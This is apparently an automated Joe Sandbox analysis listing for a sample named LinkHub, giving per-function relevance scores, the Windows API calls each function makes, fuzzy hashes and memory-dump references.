Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 74ebf2b2186c127ae842d27809c9e717445591dc62c26c70461fd0efb0ca863e
Instruction ID: 3de970d8cbeb7f206ea7cc0c087c6f3184fd66fc950269d09528cce2f93e99ac
Opcode Fuzzy Hash: 74ebf2b2186c127ae842d27809c9e717445591dc62c26c70461fd0efb0ca863e
Instruction Fuzzy Hash: F7D01235B176315B462227267C18DCF6A149F92F9134D0056F800B6254CFE0CD0585E8

Function 00E43306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E435C4
DeleteFileW.KERNEL32(?), ref: 00E43646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E4365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E4366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E4367F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: c5d74d1f48486ed527cb91ba6ea897e994f1aac9eda5aac4e96e726af6b170d2
Instruction ID: 7517b88b01bc7154132c0a5fe5c8c4fff5cf1cd97e40de8c1dad0fab91ef1028
Opcode Fuzzy Hash: c5d74d1f48486ed527cb91ba6ea897e994f1aac9eda5aac4e96e726af6b170d2
Instruction Fuzzy Hash: F6B14D72E0011DABDF15DBA4DC85EEEBBBDEF48354F0040A6F609B6251EA349B448B71

Function 00E5ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00E5AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E5AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E5AEC8
CloseHandle.KERNEL32(?), ref: 00E5B09D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 9d038637c9de28b0468350157160ba23e533cc334f597621c005bebbd17c3001
Instruction ID: 8f0ed6df99ea54395105dde846f5761cd6d116976374a17c454eecfc860f4be8
Opcode Fuzzy Hash: 9d038637c9de28b0468350157160ba23e533cc334f597621c005bebbd17c3001
Instruction Fuzzy Hash: D4A19D71A04301AFE720EF25C886B2AB7E1EF44714F54885DF9999B3D2DB71EC448BA1

Function 00E5C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E5D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E5C10E,?,?), ref: 00E5D415
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D451
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4C8
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E5C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E5C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E5C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00E5C606
RegCloseKey.ADVAPI32(00000000), ref: 00E5C613

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 4aebbd93272ca16c05509bf167796ecc4b77e31ab395c9decbaae47d46dbbb11
Instruction ID: 133c12d8bcea0b49ad8f02b23e186f941192f1cc5cf8d0dd1d7b5b5e948fedc5
Opcode Fuzzy Hash: 4aebbd93272ca16c05509bf167796ecc4b77e31ab395c9decbaae47d46dbbb11
Instruction Fuzzy Hash: C1619F31208341AFC714DF64C890E6ABBE5FF84308F64995DF4599B292DB31ED49CBA2

Function 00E3ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E3D7CD,?), ref: 00E3E714

Part of subcall function 00E3E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E3D7CD,?), ref: 00E3E72D

Part of subcall function 00E3EAB0: GetFileAttributesW.KERNEL32(?,00E3D840), ref: 00E3EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00E3ED8A
MoveFileW.KERNEL32(?,?), ref: 00E3EDC3
_wcslen.LIBCMT ref: 00E3EF02
_wcslen.LIBCMT ref: 00E3EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E3EF67

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f2aa26fc6418967766737f6e74e391b39d6832f61d89155702112e3cd23696ea
Instruction ID: cf8038a47a4ba9daee1de31d51fb0907929a30b0f34c3fffc755b9ce28760344
Opcode Fuzzy Hash: f2aa26fc6418967766737f6e74e391b39d6832f61d89155702112e3cd23696ea
Instruction Fuzzy Hash: A151B5B25083449BC724EB60DC859DBB7ECEF84344F40192EF285D3291EF71A688C766

Function 00E39517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E39534
VariantClear.OLEAUT32 ref: 00E395A5
VariantClear.OLEAUT32 ref: 00E39604
VariantClear.OLEAUT32(?), ref: 00E39677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E396A2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 160bafd0a0472ac7b4797d2e2e75521f017e27d396ccc20a27181aa0642489f7
Instruction ID: 0b24879d5bce7becc9924a98ab4c853ef430e1041d50b091046ec72925ea2f87
Opcode Fuzzy Hash: 160bafd0a0472ac7b4797d2e2e75521f017e27d396ccc20a27181aa0642489f7
Instruction Fuzzy Hash: 605149B5A01219EFCB14CF59D884AAABBF8FF88314F158559E916EB310E770E911CF90

Function 00E49540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E495F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E4961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E49677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E4969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E496A4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ef09b0f6d406d5d912f026e390ad3de2881eb46e58416a985865efe19135c489
Instruction ID: 4cf2322512e71681453380518996d4527f665e49b48f849e84aa4fd5094ec14f
Opcode Fuzzy Hash: ef09b0f6d406d5d912f026e390ad3de2881eb46e58416a985865efe19135c489
Instruction Fuzzy Hash: 3A514C35A002199FCF11DF65D881A6ABBF5FF48314F058099E849AB362CB35ED41CFA0

Function 00E59941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E5999D
GetProcAddress.KERNEL32(00000000,?), ref: 00E59A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00E59A49
GetProcAddress.KERNEL32(00000000,?), ref: 00E59A8F
FreeLibrary.KERNEL32(00000000), ref: 00E59AAF

Part of subcall function 00DEF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E41A02,?,753CE610), ref: 00DEF9F1
Part of subcall function 00DEF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E30354,00000000,00000000,?,?,00E41A02,?,753CE610,?,00E30354), ref: 00DEFA18

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 9b30dc231543c63210aa3b579dbea781845a32449e0c51f09d4c0672d071f833
Instruction ID: 26ce23e3b92f29042b59a359e36992f5be6fd8f72952227f41bc0df07504725d
Opcode Fuzzy Hash: 9b30dc231543c63210aa3b579dbea781845a32449e0c51f09d4c0672d071f833
Instruction Fuzzy Hash: E9516C35604245DFCB01DF68C4849DDBBB1FF09319B159599E806AB322D731ED89CFA1

Function 00E675AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E6766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00E67682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E676AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E4B5BE,00000000,00000000), ref: 00E676D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E676FF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ae6214adfa1267737851c2f7543ae5666f9d522bb05e1326f0ff0a9617fac482
Instruction ID: 8d64b33a350dbaafd31327667d21fe862e6125890b984631c45494c4982d3c09
Opcode Fuzzy Hash: ae6214adfa1267737851c2f7543ae5666f9d522bb05e1326f0ff0a9617fac482
Instruction Fuzzy Hash: AC410635A88504AFD725CF2CEC48FAE7BA5EB493A8F151254F895B72E0D370ED50C650

Function 00E023C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E02433
_free.LIBCMT ref: 00E02453

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bc083ead43093b7e7f497d478ab0eac908ee895c74d332d64069b99996a699b9
Instruction ID: 472c7126c56617bb1dbbfac0b1b8a5dda50f3f033e1ce162189a63002825c0be
Opcode Fuzzy Hash: bc083ead43093b7e7f497d478ab0eac908ee895c74d332d64069b99996a699b9
Instruction Fuzzy Hash: F641CF32A002149FCB20DF78C885A6EB7F6EF89318F1585ADE615FB391D631AD41DB90

Function 00DD19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DD19E1
ScreenToClient.USER32(00000000,?), ref: 00DD19FE
GetAsyncKeyState.USER32(00000001), ref: 00DD1A23
GetAsyncKeyState.USER32(00000002), ref: 00DD1A3D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 01da5f4ace2b40c8b8ce1e055e1e82aa27654b4c136dab589f7ebc1be1c57844
Instruction ID: 562420c51d4e0125122bf901a9283cbb0ded56ff0360f756ffccbf5de7ceee62
Opcode Fuzzy Hash: 01da5f4ace2b40c8b8ce1e055e1e82aa27654b4c136dab589f7ebc1be1c57844
Instruction Fuzzy Hash: B1416D75A0910AFFDF159F64C844BEEB7B4FB05364F20921AE469B2290C7706E94CBA1

Function 00E3224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E32262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00E3230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00E32316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00E32327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E3232F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2f7a3030f2e3bc1f7ac0d713b0b16b278f4567835ba151cde505fcff7b9cc76d
Instruction ID: 3d89e22bb1538b6d7e6f8d7299076d04e290c6a65b6325924ea4a41510db151b
Opcode Fuzzy Hash: 2f7a3030f2e3bc1f7ac0d713b0b16b278f4567835ba151cde505fcff7b9cc76d
Instruction Fuzzy Hash: 7E31B071A00219EFDB00CFA8DD8CADE3BB5EB04319F004219FA61AB2E0C3B09944CB90

Function 00E4D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E4CC63,00000000), ref: 00E4D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00E4D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00E4CC63,00000000), ref: 00E4D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00E4CC63,00000000), ref: 00E4DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00E4CC63,00000000), ref: 00E4DA37

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 114cd92938b2cc60da8b6d1d10f9657f166fcc5ea99025df5e46c2882af785b2
Instruction ID: d810ae2de15a7c1adc4cda5ab4c6cbdeb31c5324f4c0cd9322c31edf5d1ccb52
Opcode Fuzzy Hash: 114cd92938b2cc60da8b6d1d10f9657f166fcc5ea99025df5e46c2882af785b2
Instruction Fuzzy Hash: AA314171A08305EFDB20DFA6EC84AAFBBF8EB54754B10942EE546E3250D770ED449B60

Function 00E661A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E661E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00E6623C
_wcslen.LIBCMT ref: 00E6624E
_wcslen.LIBCMT ref: 00E66259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E662B5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 7b1823d3cdbb148af1af12d1e71991dbe8408f31acbe7b8e52d546571ce30391
Instruction ID: 4e35775e9c5e27d24bb54468c1bd6320a15dcb71c3d1b57a259272638b48184c
Opcode Fuzzy Hash: 7b1823d3cdbb148af1af12d1e71991dbe8408f31acbe7b8e52d546571ce30391
Instruction Fuzzy Hash: 5221E631A502089BDB119F54EC84EEEBBB8FF55394F109216FA24FA180D7709985CFA0

Function 00E5138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E513AE
GetForegroundWindow.USER32 ref: 00E513C5
GetDC.USER32(00000000), ref: 00E51401
GetPixel.GDI32(00000000,?,00000003), ref: 00E5140D
ReleaseDC.USER32(00000000,00000003), ref: 00E51445

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 6df17d6e84c046f1149bee9270aeb8e070cbc4eb40dc2ddecbe6d972f4bd0fdf
Instruction ID: 3c27eea8196df8a16277722f7a2c8b81528318d97efc8c82e726b3dd4a68c40c
Opcode Fuzzy Hash: 6df17d6e84c046f1149bee9270aeb8e070cbc4eb40dc2ddecbe6d972f4bd0fdf
Instruction Fuzzy Hash: E1216F35A04204AFD714EF65DC99A9EB7E5EF88341B058479F94AE7751CA70AC04CBA0

Function 00E0D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E0D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E0D169

Part of subcall function 00E03B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E03BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E0D18F
_free.LIBCMT ref: 00E0D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E0D1B1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f941ab01ef0a4fab3f51115e58aa625d19380ea227b40335747f4ecaa62c2c32
Instruction ID: 350b03fb69ef49319dd23e7fb4beae8d58b81e5edf940744a4facdced1089658
Opcode Fuzzy Hash: f941ab01ef0a4fab3f51115e58aa625d19380ea227b40335747f4ecaa62c2c32
Instruction Fuzzy Hash: 0001DD76B0B6157FB32126FB5C4CCBB7A6DDEC2BA53141119FD04E2280DEB08C4182B0

Function 00E0316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(74DE2E40,?,?,00DFF64E,00E03BD6,?,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E03170
_free.LIBCMT ref: 00E031A5
_free.LIBCMT ref: 00E031CC
SetLastError.KERNEL32(00000000), ref: 00E031D9
SetLastError.KERNEL32(00000000), ref: 00E031E2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b652ca3d7d2189b070f9b26a162e9614c8a4c5d60a7a4082b1c6ce71d3dba03b
Instruction ID: 3c5a62762d1ea7b1d76008bd7521b7391bec21a91add482315d14c643ce91db9
Opcode Fuzzy Hash: b652ca3d7d2189b070f9b26a162e9614c8a4c5d60a7a4082b1c6ce71d3dba03b
